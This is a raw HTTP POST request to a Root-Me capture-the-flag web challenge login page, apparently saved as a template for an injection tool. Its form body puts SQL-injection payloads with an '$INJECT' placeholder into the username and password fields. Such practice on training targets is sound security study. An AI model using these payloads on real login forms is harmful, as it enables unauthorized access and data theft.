POST /web-serveur/ch27/?action=login HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://challenge01.root-me.org/web-serveur/ch27/?action=login
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=root" or $INJECT and "1"="1&password=toor" or $INJECT and "1"="1


